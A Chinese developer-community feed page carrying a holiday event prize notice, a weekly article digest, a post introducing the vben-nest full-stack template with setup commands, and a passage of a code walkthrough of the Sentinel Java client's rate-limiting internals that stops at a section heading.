普通视图

发现新文章,点击刷新页面。
今天 — 2026年2月26日首页

「寻找年味」 沸点活动|获奖名单公示🎊

作者 掘金酱
2026年2月26日 18:15

image.png

🎉2026年 「寻找年味」 沸点活动正式落幕啦!

这个春节,我们在沸点里看见了无数动人瞬间:有故乡的烟火,有团圆的温柔,也有坚守岗位的专注与光芒。

每一条沸点,都是最真实、最可爱、最有温度的新年风景。

感谢每一位技术er,用文字、照片与 AI 创作,记录独属于程序员的春节时光,让技术与年味温暖相融。

由于获奖用户较多,详细的名单公示如下:[2026年 寻找年味沸点活动_获奖名单]

如何快速找到自己:进入飞书表格后,使用 Ctr+F 搜索自己的用户名或 用户id,选择“所有工作表”( 用户 id 即掘金主页 juejin.cn/XXXXXX 最后的一串数字)。之前打开过本表同学请刷新表单,奖项或有增补,以最新的表格为准。

image.png

活动奖品

沸点将根据评审团综合打分互动量得分加权计算。

✅ 常规内容赛道:TOP10 赢 SZCOOL 无线蓝牙音箱

✅ AI 内容赛道: TOP10 拿下「窝在一起」瓦楞猫窝

✅阳光普照奖:凡是符合#寻找年味主题的且有互动(排除作者自己点赞和评论)的沸点内容皆可获得10w 矿石

领奖方式

  • 获得上述奖项的掘友近期请注意 [系统消息] (预计2026年2月26日23:00前下发),请于 2026 年 3 月 4 日 23 点 之前在相关问卷中填写信息,过期将视为放弃奖品。
  • 常规内容赛道/AI 内容赛道 奖品将于问卷截止日期后的 30 个工作日内完成发放。
  • 阳光普照奖矿石将于2026年3月5日(申述时间截止后)发放。

若对获奖名单有疑问,请先自查沸点,确认无以下原因后,可点击联系 爱专研的安东尼 进行申诉。 申诉处理时间2026年2月26日-2026年3月4日,过时维持原结果。

  • 参赛沸点互动量按「点赞数 + 评论数」总和核算;

  • 同一用户发布多条内容,仅取数据最优一条参与排名获奖;

  • 无意义水评论、刷赞等违规行为,剔除获奖资格;

  • 数据统计截止至 2026 年 2 月 23 日 23:59,逾期新增互动不计入;

  • 禁止引战/制造冲突/谩骂内容,或者发现引战内容剔除获奖资格;

  • 评审团会依据沸点内容质量进行打分排序;

  • 非AI相关内容都归类为常规内容赛道,两个赛道不重复获奖,阳光普照奖可叠加赛道获奖;

再次感谢所有掘友的热情参与,愿大家新的一年代码无 Bug、技术节节高、万事皆顺遂!

2026 春晚魔术大揭秘:作为程序员,分分钟复刻一个 | 掘金一周 2.26

作者 掘金一周
2026年2月26日 17:07

本文字数1300+ ,阅读时间大约需要 4分钟。

【掘金一周】本期亮点:

「上榜规则」:文章发布时间在本期「掘金一周」发布时间的前一周内;且符合各个栏目的内容定位和要求。 如发现文章有抄袭、洗稿等违反社区规则的行为,将取消当期及后续上榜资格。

一周“金”选

掘金一周 文章头图 1303x734.jpg

内容评审们会在过去的一周内对社区深度技术好文进行挖掘和筛选,优质的技术文章有机会出现在下方榜单中,排名不分先后。

前端

2026 春晚魔术大揭秘:作为程序员,分分钟复刻一个(附源码) @程序员Sunday

在这个 App 进入“魔术模式”后,键盘事件已经被 e.preventDefault() 拦截了。无论你按哪个数字键,屏幕上只会依次显示程序预设好的那个 差值字符串

我写了个 code-review 的 Agent Skill, 没想到火了 @神三元

四份 checklist 的内容加起来好几千字,如果全塞进 SKILL.md,一上来就会吃掉大量上下文窗口。所以我把它们放在 references/ 里,SKILL.md 里只在需要的步骤写 Load references/xxx.md

构建工具的第三次革命:从 Rollup 到 Rust Bundler,我是如何设计 robuild 的 @sunny_

robuild 就是为解决这些问题而设计的。它基于 Rolldown(Rust 实现的 Rollup 替代品)和 Oxc(Rust 实现的 JavaScript 工具链),专注于库构建场景。

后端

Spring 源码分析 事务管理的实现原理(下) @暮色妖娆丶

这里我以 SpringBoot 源码入口为起点,画了一个相关的流程图,包含了 SpringBoot、Spring 事务、Spring AOP、Spring 事件、BeanFactoryPostProcessor、BeanPostProcessor 等所有 Spring 知识,以及相关模块之间的交互联系

一站式了解Agent Skills @想用offer打牌

因为skills只会暴露name和description,所以agent会自己判断什么场景使用这个skill,就像我们玩游戏一样,脑子已经潜移默化这种场景使用这种skills或者按这样的顺序将多种skills结合使用。

Android

丰田正在使用 Flutter 开发游戏引擎 Fluorite @恋猫de小郭

对于 Fluorite ,目前主要的集成方式就是用 FluoriteView 在 Flutter App 中添加多个 3D 视图,所以可以直接用 Flutter 生态,而 C++ 核心确保在低端硬件(如车载屏)实现主机级效果,避免 Godot 等开源引擎的启动慢/资源重问题。

Flutter 设计包解耦新进展,material_ui 和 cupertino_ui 发布预告 @恋猫de小郭

未来 Flutter 在 Framework 内将不带任何 material 和 cupertino 样式,你可以根据需要选择样式库,甚至觉得使用哪个样式库版本,最重要的是:不升级 Flutter 版本也可以更新最新的设计样式,同时控件 Bug 也可以得到更快的修复和发布

把离线AI代理装进口袋里 @稀有猿诉

正如你的输入是结构化的一样,模型的输出也是结构化的。模型不会仅仅返回一个最终的文本块。相反,它会返回一个 ModelResponse 对象流,其中每个对象代表一种不同的输出类型。模型可能生成纯文本,也可能决定调用你的某个函数。

人工智能

你知道不,你现在给 AI 用的 Agent Skills 可能毫无作用,甚至还拖后腿? @恋猫de小郭

高质量技能 = 搜索空间压缩器,它可以限定决策路径、减少无效探索、提供验证锚点和显式化领域隐性流程,这才是 Skills 能推高 Pareto frontier 的原因,所以,你需要避免百科式技能,它可能带来的更多的噪音。

Rust 编写的 40MB 大小 MicroVM 运行时,完美替代 Docker 作为 AI Agent Sandbox @RoyLin

在 AI Agent 时代,安全的代码执行环境不再是可选项,而是基础设施。A3S Box 正是为这个时代而生的运行时——它让每一行不可信的代码都运行在硬件隔离的沙箱中,让每一字节敏感数据都受到硬件加密的保护,同时让开发者感觉就像在使用 Docker 一样简单。

Skills 实战:让 AI 成为你的领域专家 @冬奇Lab

description 是 Skill 触发的关键。Claude 根据用户请求与 description 的匹配度决定是否加载该 Skill。

📖 投稿专区

大家可以在评论区推荐认为不错的文章,并附上链接和推荐理由,有机会呈现在下一期。文章创建日期必须在下期掘金一周发布前一周以内;可以推荐自己的文章、也可以推荐他人的文章。

AI 全栈时代的工程化护栏:Vben-Nest 让 Mock 契约落地成真实后端

作者 _Jude
2026年2月26日 16:28

AI 让“会写代码的人”变多了,但也让一个老问题更显眼:写得快并不等于做得稳。

  • vibe coding 很爽,但在企业协作/长期迭代里,如果缺少统一规范与质量门禁,返工会非常昂贵
  • 前后端分离的联调常常依赖 Apifox MCP 这类工具,但契约同步、环境对齐、反复调用依然麻烦,而且还会额外消耗 token
  • 真正吸引人的方向是“全栈 + AI”:把重复劳动交给 AI,把关键决策交给工程化与契约,降低个人做全栈的门槛

这份项目模板 vben-nest 的核心思路很直接:在 vben 的工程化底座上新增 Nest 后端(apps/server),并让后端接口完全适配 vben 原本的 mock 契约。前端调用尽量不改,只替换“接口实现者”,从 mock 走向真实后端更平滑、更可演进。

1. 为什么不是“随便写接口”:全栈的关键是契约

一个判断是:随着 AI 能力增强,“前后端一个人搞”会越来越常见。原因并不神秘:很多业务难点不在 UI 或 API 的某一端,而在业务逻辑本身。

当 AI 能把样板代码写得更快时,决定交付质量的就变成了:

  • 需求是否能被拆成稳定的接口契约
  • 前后端是否能围绕同一套领域模型演进
  • 多人协作与长期维护里,边界是否足够清晰、成本是否可控

社区里也常有人吐槽 vben“很重”。但把视角从“个人 demo”切换到“企业协作”,它更像是在提前支付必要成本:规范、质量门禁、脚手架、依赖治理,以及可观测的目录结构与约定。

2. vibe coding 的边界:快要配护栏

vibe coding 适合快速验证与个人实验;一旦进入团队协作或中长期迭代,劣势会迅速放大:风格不一致、边界不清晰、可测试性差、回归成本高。AI 越强,越容易把“写得像能跑”误当成“工程上可交付”。

更理想的组合是:

  • AI 负责加速产出
  • 工程化负责约束质量与一致性

3. 这个项目做了什么:用 Nest 复刻并升级 vben mock

vben 自带的后端 mock(见 apps/backend-mock)已经非常接近真实后端:它不是浏览器里的 mock.js,而是一套独立服务实现,因此能覆盖文件上传、复杂逻辑、鉴权流程等更真实的场景。

vben-nest 在此基础上新增了 Nest 后端(见 apps/server),并坚持一个核心原则:

前端不改接口调用方式,只替换“实现者”。

路径、方法、响应结构、鉴权方式尽量保持一致,从 mock 平滑迁移到真实后端;甚至可以做到“先跑起来,再逐步替换为真实业务”。

4. 兼容策略与实现要点:对齐调用习惯,也保留演进空间

4.1 接口层:兼容 vben 的响应约定

Nest 侧做了三件事,降低前端切换成本:

  • 使用全局前缀 api,对齐 vben 的请求习惯(见 main.ts
  • 通过全局响应拦截器,统一包装为 { code, data, message, error }(见 ResponseInterceptor
  • 通过全局异常过滤器,统一输出错误结构(见 HttpExceptionFilter

这样前端的请求层可以继续使用原有的 code/data 成功码约定(例如 playground 的请求拦截器依旧按 successCode: 0 解析,见 request.ts)。

4.2 鉴权层:从"能用"到"更像生产"

很多 mock 方案只做"伪登录",但真实项目通常会有 refresh token、cookie 策略、过期处理等细节。Nest 侧采用:

这让"用模板练全栈"更贴近真实业务,而不是停留在 demo 层面。

4.3 数据层:从 mock-data 到可落库演进

为了让后端具备真实项目的演进空间,这里引入:

可以先用 seed 数据把前端跑通,再逐步把 mock-data 替换成真实表结构与业务逻辑。

4.4 工程化:把 vben 的护栏带到后端

这类模板的“核心价值”不在于多写了几个接口,而在于少搭了一套后端工程规范。

Nest 同样处于 TypeScript 生态,把后端放进 vben 的 monorepo 后,直接获得:

  • 代码格式化与 lint 约束(Prettier/ESLint/Stylelint)
  • Git Hooks 质量门禁(Lefthook + Commitlint,见 lefthook.yml
  • 统一依赖治理与脚本编排(pnpm workspace + turbo)

在 AI 参与编码的前提下,这套护栏能把“产出速度”与“可维护性”拉到一个更平衡的位置。

5. 快速开始

环境要求

  • Node.js >= 20.19
  • pnpm >= 10(推荐使用 corepack)
  • Docker Desktop(推荐,用于一键启动 PostgreSQL)

安装与运行

# 克隆项目
git clone https://github.com/MiniJude/vben-nest.git
cd vben-nest

# 安装依赖
npm i -g corepack
pnpm install

# 启动数据库 (Docker Compose)
docker compose -f apps/server/docker-compose.yml up -d

# 初始化数据库结构与种子数据
pnpm -F @vben/server run db:init

# 启动后端服务
pnpm -F @vben/server run dev
# 默认端口:3000

# 启动前端 Playground (新开终端)
pnpm dev:play

默认账号

  • vben / 123456
  • admin / 123456
  • jack / 123456

6. 目录结构速览:前端多方案 + 后端可落库

  • 前端应用:apps/web-*(多 UI 方案示例)
  • Playground:playground/(用于快速体验与联调)
  • Mock 服务:apps/backend-mock/(vben 原生 mock 服务实现)
  • Nest 后端:apps/server/(本项目新增,适配 mock 契约)

6. 全栈 + AI 的实践建议:契约先行

更推荐的协作方式是“契约先行(Contract First)”:

  • 先把接口契约稳定下来(URL、method、code/data 结构、分页约定、错误约定)
  • 再让 AI 生成 DTO、Controller、Service、Prisma Schema 的骨架
  • 依靠 lint、类型系统、提交规范,把代码质量稳定在可维护区间

前后端分离下,工具链可以帮助联调,但契约才是协作的“唯一事实来源”。

7. 适合谁使用

  • 想从 vben 上手全栈的前端同学:用熟悉的前端工程体系,把后端也纳入同一条流水线
  • 想快速搭建企业级全栈脚手架的小团队:少做重复造轮子,把精力留给业务
  • 想在真实工程约束下用 AI 提效的人:让 AI 提速,同时保留规范与可演进性

8. 项目链接

github.com/MiniJude/vb…

9. 后续演进

当前版本更偏向“理念与路径”的最小落地:先把接口契约与工程化护栏对齐,让 mock 能平滑替换为可演进的真实后端。面向生产的后端工程还需要持续补齐监控、日志、权限、安全、审计等能力,本项目也会按迭代节奏逐步完善。

Sentinel Java客户端限流原理解析|得物技术

作者 得物技术
2026年2月26日 13:33

一、从一次 HTTP 请求开始

在一个生产环境中,服务节点通常暴露了成百上千个 HTTP 接口对外提供服务。为了保证系统的稳定性,核心 HTTP 接口往往需要配置限流规则。给 HTTP 接口配置限流,可以防止突发或恶意的高并发请求耗尽服务器资源(如 CPU、内存、数据库连接等),从而避免服务崩溃或引发雪崩效应。

基础示例

假设我们有下面这样一个 HTTP 接口,需要给它配置限流规则:

@RestController
@RequiredArgsConstructor
@RequestMapping("/demo")
public class DemoController {

    @RequestMapping("/hello")
    @SentinelResource("test_sentinel")
    public String hello() {
        return "hello world";
    }
}

使用起来非常简单。首先我们可以选择给接口加上 @SentinelResource 注解(也可以不加,如果不加 Sentinel 客户端会使用请求路径作为资源名,详细原理在后面章节讲解),然后到流控控制台给该资源配置流控规则即可。

二、限流规则的加载

限流规则的生效,是从限流规则的加载开始的。聚焦到客户端的 RuleLoader 类,可以看到它支持了多种规则的加载:

  • 流控规则;
  • 集群限流规则;
  • 熔断规则;
  • ......

RuleLoader 核心逻辑

RuleLoader 类的核心作用是将这些规则加载到缓存中,方便后续使用:

public class RuleLoader {

    /**
     * 加载所有 Sentinel 规则到内存缓存
     *
     * @param sentinelRules 包含各种规则的配置对象
     */
    public static void loadRule(SentinelRules sentinelRules) {
        if (sentinelRules == null) {
            return;
        }

        // 加载流控规则
        FlowRuleManager.loadRules(sentinelRules.getFlowRules());
        // 加载集群流控规则
        RuleManager.loadClusterFlowRule(sentinelRules.getFlowRules());

        // 加载参数流控规则
        ParamFlowRuleManager.loadRules(sentinelRules.getParamFlowRules());
        // 加载参数集群流控规则
        RuleManager.loadClusterParamFlowRule(sentinelRules.getParamFlowRules());

        // 加载熔断规则
        DegradeRuleManager.loadRules(sentinelRules.getDegradeRules());

        // 加载参数熔断规则
        ParamDegradeRuleManager.loadRules(sentinelRules.getParamDegradeRules());

        // 加载系统限流规则
        SystemRuleManager.loadRules(sentinelRules.getSystemRules());
    }
}

流控规则加载详情

以流控规则的加载为例深入FlowRuleManager.loadRules 方法可以看到其完整的加载逻辑:

public static void loadRules(List<FlowRule> rules) {
    // 通过动态配置属性更新规则值
    currentProperty.updateValue(rules);
}

updateValue 方法负责通知所有监听器配置变更:

public boolean updateValue(T newValue) {
    // 如果新旧值相同,无需更新
    if (isEqual(value, newValue)) {
        return false;
    }
    RecordLog.info("[DynamicSentinelProperty] Config will be updated to: " + newValue);

    // 更新配置值
    value = newValue;
    // 通知所有监听器配置已更新
    for (PropertyListener<T> listener : listeners) {
        listener.configUpdate(newValue);
    }
    return true;
}

FlowPropertyListener 是流控规则变更的具体监听器实现:

private static final class FlowPropertyListener implements PropertyListener<List<FlowRule>> {

    @Override
    public void configUpdate(List<FlowRule> value) {
        // 构建流控规则映射表(按资源名分组)
        Map<String, List<FlowRule>> rules = FlowRuleUtil.buildFlowRuleMap(value);
        if (rules != null) {
            // 清空旧规则
            flowRules.clear();
            // 加载新规则
            flowRules.putAll(rules);
        }
        RecordLog.info("[FlowRuleManager] Flow rules received: " + flowRules);
    }
}

三、SentinelServletFilter 过滤器

在 Sentinel 中,所有的资源都对应一个资源名称和一个 Entry。Entry 可以通过对主流框架的适配自动创建,也可以通过注解的方式或调用 API 显式创建。Entry 是限流的入口类,通过 @SentinelResource 注解的限流本质上也是通过 AOP 的方式进行了对 Entry 类的调用。

Entry 的编程范式

Entry 类的标准使用方式如下:

// 资源名可使用任意有业务语义的字符串,比如方法名、接口名或其它可唯一标识的字符串
try (Entry entry = SphU.entry("resourceName")) {
    // 被保护的业务逻辑
    // do something here...
} catch (BlockException ex) {
    // 资源访问阻止,被限流或被降级
    // 在此处进行相应的处理操作
}

Servlet Filter 拦截逻辑

对于一个 HTTP 资源,在没有显式标注 @SentinelResource 注解的情况下,会有一个 Servlet Filter 类 SentinelServletFilter 统一进行拦截:

public class SentinelServletFilter implements Filter {

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest sRequest = (HttpServletRequest) request;
        Entry urlEntry = null;

        try {
            // 获取并清理请求路径
            String target = FilterUtil.filterTarget(sRequest);

            // 统一 URL 清理逻辑
            // 对于 RESTful API,必须对 URL 进行清理(例如将 /foo/1 和 /foo/2 统一为 /foo/:id),
            // 否则上下文和资源的数量会超过阈值
            SentinelUrlCleaner urlCleaner = SentinelUrlCleaner.SENTINEL_URL_CLEANER;
            if (urlCleaner != null) {
                target = urlCleaner.clean(sRequest, target);
            }

            // 如果请求路径不为空且非安全扫描,则进入限流逻辑
            if (!StringUtil.isEmpty(target) && !isSecScan) {
                // 解析来源标识(用于来源限流)
                String origin = parseOrigin(sRequest);
                // 确定上下文名称
                String contextName = webContextUnify
                    ? WebServletConfig.WEB_SERVLET_CONTEXT_NAME
                    : target;

                // 使用 WEB_SERVLET_CONTEXT_NAME 作为当前 Context 的名字
                ContextUtil.enter(contextName, origin);

                // 根据配置决定是否包含 HTTP 方法
                if (httpMethodSpecify) {
                    String pathWithHttpMethod = sRequest.getMethod().toUpperCase() + COLON + target;
                    // 实际进入到限流统计判断逻辑,资源名是 "方法:路径"
                    urlEntry = SphU.entry(pathWithHttpMethod, ResourceTypeConstants.COMMON_WEB, EntryType.IN);
                } else {
                    // 实际进入到限流统计判断逻辑,资源名是请求路径
                    urlEntry = SphU.entry(target, ResourceTypeConstants.COMMON_WEB, EntryType.IN);
                }
            }

            // 继续执行后续过滤器
            chain.doFilter(request, response);

        } catch (BlockException e) {
            // 处理被限流的情况
            HttpServletResponse sResponse = (HttpServletResponse) response;
            // 返回限流页面或重定向到其他 URL
            WebCallbackManager.getUrlBlockHandler().blocked(sRequest, sResponse, e);

        } catch (IOException | ServletException | RuntimeException e2) {
            // 记录异常信息用于统计
            Tracer.traceEntry(e2, urlEntry);
            throw e2;

        } finally {
            // 释放 Entry 资源
            if (urlEntry != null) {
                urlEntry.exit();
            }
            // 退出当前上下文
            ContextUtil.exit();
        }
    }
}

四、SentinelResourceAspect 切面

如果在接口上标注了 @SentinelResource 注解,还会有另外的逻辑处理。Sentinel 定义了一个单独的 AOP 切面 SentinelResourceAspect 专门用于处理注解限流。

SentinelResource 注解定义

先来看看 @SentinelResource 注解的完整定义:

@Target({ElementType.METHOD, ElementType.TYPE})
@Retention(RetentionPolicy.RUNTIME)
@Inherited
public @interface SentinelResource {

    /**
     * Sentinel 资源的名称(即资源标识)
     * 必填项,不能为空
     */
    String value() default "";

    /**
     * 资源的入口类型(入站 IN 或出站 OUT)
     * 默认为出站(OUT)
     */
    EntryType entryType() default EntryType.OUT;

    /**
     * 资源的分类(类型)
     * 自 1.7.0 版本起支持
     */
    int resourceType() default 0;

    /**
     * 限流或熔断时调用的 block 异常处理方法的名称
     * 默认为空(即不指定)
     */
    String blockHandler() default "";

    /**
     * blockHandler 所在的类
     * 如果与原方法不在同一个类,需要指定此参数
     */
    Class<?>[] blockHandlerClass() default {};

    /**
     * 降级(fallback)方法的名称
     * 默认为空(即不指定)
     */
    String fallback() default "";

    /**
     * 用作通用的默认降级方法
     * 该方法不能接收任何参数,且返回类型需与原方法兼容
     */
    String defaultFallback() default "";

    /**
     * fallback 所在的类
     * 如果与原方法不在同一个类,需要指定此参数
     */
    Class<?>[] fallbackClass() default {};

    /**
     * 需要被追踪并触发 fallback 的异常类型列表
     * 默认为 Throwable(即所有异常都会触发 fallback)
     */
    Class<? extends Throwable>[] exceptionsToTrace() default {Throwable.class};

    /**
     * 指定需要忽略的异常类型(即这些异常不会触发 fallback)
     * 注意:exceptionsToTrace 和 exceptionsToIgnore 不应同时使用;
     * 若同时存在,exceptionsToIgnore 优先级更高
     */
    Class<? extends Throwable>[] exceptionsToIgnore() default {};
}

实际使用示例

下面是一个完整的使用示例,展示了 @SentinelResource 注解的各种配置方式:

@RestController
public class SentinelController {

    @Autowired
    private ISentinelService service;

    @GetMapping(value = "/hello/{s}")
    public String apiHello(@PathVariable long s) {
        return service.hello(s);
    }
}

public interface ISentinelService {
    String hello(long s);
}

@Service
@Slf4j
public class SentinelServiceImpl implements ISentinelService {

    /**
     * Sentinel 提供了 @SentinelResource 注解用于定义资源
     *
     * @param s 输入参数
     * @return 返回结果
     */
    @Override
    // value:资源名称,必需项(不能为空)
    // blockHandler:对应处理 BlockException 的函数名称
    // fallback:用于在抛出异常的时候提供 fallback 处理逻辑
    @SentinelResource(value = "hello", blockHandler = "exceptionHandler", fallback = "helloFallback")
    public String hello(long s) {
        log.error("hello:{}", s);
        return String.format("Hello at %d", s);
    }

    /**
     * Fallback 函数
     * 函数签名与原函数一致,或加一个 Throwable 类型的参数
     */
    public String helloFallback(long s) {
        log.error("helloFallback:{}", s);
        return String.format("Halooooo %d", s);
    }

    /**
     * Block 异常处理函数
     * 参数最后多一个 BlockException,其余与原函数一致
     */
    public String exceptionHandler(long s, BlockException ex) {
        // Do some log here.
        log.error("exceptionHandler:{}", s);
        ex.printStackTrace();
        return "Oops, error occurred at " + s;
    }
}

SentinelResourceAspect 核心逻辑

@SentinelResource 注解由 SentinelResourceAspect 切面处理,核心逻辑如下:

@Aspect
public class SentinelResourceAspect extends AbstractSentinelAspectSupport {

    @Pointcut("@annotation(com.alibaba.csp.sentinel.annotation.SentinelResource)")
    public void sentinelResourceAnnotationPointcut() {
    }

    @Around("sentinelResourceAnnotationPointcut()")
    public Object invokeResourceWithSentinel(ProceedingJoinPoint pjp) throws Throwable {
        // 获取目标方法
        Method originMethod = resolveMethod(pjp);

        // 获取注解信息
        SentinelResource annotation = originMethod.getAnnotation(SentinelResource.class);
        if (annotation == null) {
            throw new IllegalStateException("Wrong state for SentinelResource annotation");
        }

        // 获取资源配置信息
        String resourceName = getResourceName(annotation.value(), originMethod);
        EntryType entryType = annotation.entryType();
        int resourceType = annotation.resourceType();

        Entry entry = null;
        try {
            // 创建限流入口
            entry = SphU.entry(resourceName, resourceType, entryType, pjp.getArgs());
            // 执行原方法
            Object result = pjp.proceed();
            return result;

        } catch (BlockException ex) {
            // 处理被限流异常
            return handleBlockException(pjp, annotation, ex);

        } catch (Throwable ex) {
            // 处理业务异常
            Class<? extends Throwable>[] exceptionsToIgnore = annotation.exceptionsToIgnore();
            // 优先检查忽略列表
            if (exceptionsToIgnore.length > 0 && exceptionBelongsTo(ex, exceptionsToIgnore)) {
                throw ex;
            }
            // 检查异常是否在追踪列表中
            if (exceptionBelongsTo(ex, annotation.exceptionsToTrace())) {
                traceException(ex);
                // 执行 fallback 逻辑
                return handleFallback(pjp, annotation, ex);
            }

            // 没有 fallback 函数可以处理该异常,直接抛出
            throw ex;

        } finally {
            // 释放 Entry 资源
            if (entry != null) {
                entry.exit(1, pjp.getArgs());
            }
        }
    }

    /**
     * 处理 BlockException
     *
     * blockHandler / blockHandlerClass 说明:
     * - blockHandler:对应处理 BlockException 的函数名称,可选项
     * - blockHandler 函数签名:与原方法相匹配并且最后加一个额外的参数,类型为 BlockException
     * - blockHandler 函数默认需要和原方法在同一个类中
     * - 若希望使用其他类的函数,则可以指定 blockHandlerClass 为对应的类的 Class 对象
     * - 注意:blockHandlerClass 中对应的函数必须为 static 函数,否则无法解析
     */
    protected Object handleBlockException(ProceedingJoinPoint pjp, SentinelResource annotation, BlockException ex)
            throws Throwable {

        // 执行 blockHandler 方法(如果配置了的话)
        Method blockHandlerMethod = extractBlockHandlerMethod(pjp, annotation.blockHandler(),
                annotation.blockHandlerClass());

        if (blockHandlerMethod != null) {
            Object[] originArgs = pjp.getArgs();
            // 构造参数:原方法参数 + BlockException
            Object[] args = Arrays.copyOf(originArgs, originArgs.length + 1);
            args[args.length - 1] = ex;

            try {
                // 根据 static 方法与否进行不同的调用
                if (isStatic(blockHandlerMethod)) {
                    return blockHandlerMethod.invoke(null, args);
                }
                return blockHandlerMethod.invoke(pjp.getTarget(), args);
            } catch (InvocationTargetException e) {
                // 抛出实际的异常
                throw e.getTargetException();
            }
        }

        // 如果没有 blockHandler,则尝试执行 fallback
        return handleFallback(pjp, annotation, ex);
    }

    /**
     * 处理 Fallback 逻辑
     *
     * fallback / fallbackClass 说明:
     * - fallback:fallback 函数名称,可选项,用于在抛出异常的时候提供 fallback 处理逻辑
     * - fallback 函数可以针对所有类型的异常(除了 exceptionsToIgnore 里面排除掉的异常类型)进行处理
     *
     * fallback 函数签名和位置要求:
     * - 返回值类型必须与原函数返回值类型一致
     * - 方法参数列表需要和原函数一致,或者可以额外多一个 Throwable 类型的参数用于接收对应的异常
     * - fallback 函数默认需要和原方法在同一个类中
     * - 若希望使用其他类的函数,则可以指定 fallbackClass 为对应的类的 Class 对象
     * - 注意:fallbackClass 中对应的函数必须为 static 函数,否则无法解析
     */
    protected Object handleFallback(ProceedingJoinPoint pjp, String fallback, String defaultFallback,
                                    Class<?>[] fallbackClass, Throwable ex) throws Throwable {
        Object[] originArgs = pjp.getArgs();

        // 执行 fallback 函数(如果配置了的话)
        Method fallbackMethod = extractFallbackMethod(pjp, fallback, fallbackClass);

        if (fallbackMethod != null) {
            // 构造参数:根据 fallback 方法的参数数量决定是否添加异常参数
            int paramCount = fallbackMethod.getParameterTypes().length;
            Object[] args;
            if (paramCount == originArgs.length) {
                args = originArgs;
            } else {
                args = Arrays.copyOf(originArgs, originArgs.length + 1);
                args[args.length - 1] = ex;
            }

            try {
                // 根据 static 方法与否进行不同的调用
                if (isStatic(fallbackMethod)) {
                    return fallbackMethod.invoke(null, args);
                }
                return fallbackMethod.invoke(pjp.getTarget(), args);
            } catch (InvocationTargetException e) {
                // 抛出实际的异常
                throw e.getTargetException();
            }
        }

        // 如果没有 fallback,尝试使用 defaultFallback
        return handleDefaultFallback(pjp, defaultFallback, fallbackClass, ex);
    }
}

五、流控处理核心逻辑

从入口函数开始,我们深入到流控处理的核心逻辑。

入口函数调用链

public class SphU {

    /**
     * 创建限流入口
     *
     * @param name 资源名称
     * @param resourceType 资源类型
     * @param trafficType 流量类型(IN 或 OUT)
     * @param args 参数数组
     * @return Entry 对象
     * @throws BlockException 如果被限流则抛出此异常
     */
    public static Entry entry(String name, int resourceType, EntryType trafficType, Object[] args)
            throws BlockException {
        return Env.sph.entryWithType(name, resourceType, trafficType, 1, args);
    }

    public static Entry entry(String name, EntryType trafficType, int batchCount) throws BlockException {
        return Env.sph.entry(name, trafficType, batchCount, OBJECTS0);
    }
}
public class CtSph implements Sph {

    @Override
    public Entry entry(String name, EntryType type, int count, Object... args) throws BlockException {
        StringResourceWrapper resource = new StringResourceWrapper(name, type);
        return entry(resource, count, args);
    }

    public Entry entry(ResourceWrapper resourceWrapper, int count, Object... args) throws BlockException {
        return entryWithPriority(resourceWrapper, count, false, args);
    }

    /**
     * 带优先级的入口方法,这是限流的核心逻辑
     */
    private Entry entryWithPriority(ResourceWrapper resourceWrapper, int count, boolean prioritized, Object... args)
            throws BlockException {
        Context context = ContextUtil.getContext();

        // 如果上下文数量超过阈值,则不进行规则检查
        if (context instanceof NullContext) {
            // NullContext 表示上下文数量超过了阈值,这里只初始化 Entry,不进行规则检查
            return new CtEntry(resourceWrapper, null, context);
        }

        // 如果没有上下文,使用默认上下文
        if (context == null) {
            context = InternalContextUtil.internalEnter(Constants.CONTEXT_DEFAULT_NAME);
        }

        // 如果全局开关关闭,则不进行规则检查
        if (!Constants.ON) {
            return new CtEntry(resourceWrapper, null, context);
        }

        // 获取或创建 ProcessorSlotChain(责任链)
        ProcessorSlot<Object> chain = lookProcessChain(resourceWrapper);

        /*
         * 如果资源(slot chain)数量超过 {@link Constants.MAX_SLOT_CHAIN_SIZE},
         * 则不进行规则检查
         */
        if (chain == null) {
            return new CtEntry(resourceWrapper, null, context);
        }

        // 创建 Entry 对象
        Entry e = new CtEntry(resourceWrapper, chain, context);

        try {
            // 执行责任链进行规则检查
            chain.entry(context, resourceWrapper, null, count, prioritized, args);
        } catch (BlockException e1) {
            // 如果被限流,释放 Entry 并抛出异常
            e.exit(count, args);
            throw e1;
        } catch (Throwable e1) {
            // 这不应该发生,除非 Sentinel 内部存在错误
            log.warn("Sentinel unexpected exception,{}", e1.getMessage());
        }
        return e;
    }
}

ProcessorSlotChain 功能插槽链

lookProcessChain 方法实际创建了 ProcessorSlotChain 功能插槽链。ProcessorSlotChain 采用责任链模式,将不同的功能(限流、降级、系统保护)组合在一起。

SlotChain 的获取与创建

ProcessorSlot<Object> lookProcessChain(ResourceWrapper resourceWrapper) {
    // 先从缓存中获取
    ProcessorSlotChain chain = chainMap.get(resourceWrapper);

    if (chain == null) {
        // 双重检查锁,保证线程安全
        synchronized (LOCK) {
            chain = chainMap.get(resourceWrapper);
            if (chain == null) {
                // Entry 大小限制
                if (chainMap.size() >= Constants.MAX_SLOT_CHAIN_SIZE) {
                    return null;
                }

                // 创建新的 SlotChain
                chain = SlotChainProvider.newSlotChain();

                // 使用不可变模式更新缓存
                Map<ResourceWrapper, ProcessorSlotChain> newMap =
                    new HashMap<ResourceWrapper, ProcessorSlotChain>(chainMap.size() + 1);
                newMap.putAll(chainMap);
                newMap.put(resourceWrapper, chain);
                chainMap = newMap;
            }
        }
    }
    return chain;
}

SlotChain 的构建

public class DefaultSlotChainBuilder implements SlotChainBuilder {

    @Override
    public ProcessorSlotChain build() {
        ProcessorSlotChain chain = new DefaultProcessorSlotChain();

        // 通过 SPI 加载所有 ProcessorSlot 并排序
        List<ProcessorSlot> sortedSlotList = SpiLoader.loadPrototypeInstanceListSorted(ProcessorSlot.class);

        for (ProcessorSlot slot : sortedSlotList) {
            // 只处理继承自 AbstractLinkedProcessorSlot 的 Slot
            if (!(slot instanceof AbstractLinkedProcessorSlot)) {
                RecordLog.warn("The ProcessorSlot(" + slot.getClass().getCanonicalName() +
                    ") is not an instance of AbstractLinkedProcessorSlot, can't be added into ProcessorSlotChain");
                continue;
            }

            // 将 Slot 添加到责任链尾部
            chain.addLast((AbstractLinkedProcessorSlot<?>) slot);
        }

        return chain;
    }
}

SlotChain 的功能划分

Slot Chain 可以分为两部分:

  • 统计数据构建部分(statistic):负责收集各种指标数据;
  • 判断部分(rule checking):根据规则判断是否限流。

官方架构图很好地解释了各个 Slot 的作用及其负责的部分。目前 ProcessorSlotChain 的设计是一个资源对应一个,构建好后缓存起来,方便下次直接取用。

各 Slot 的执行顺序

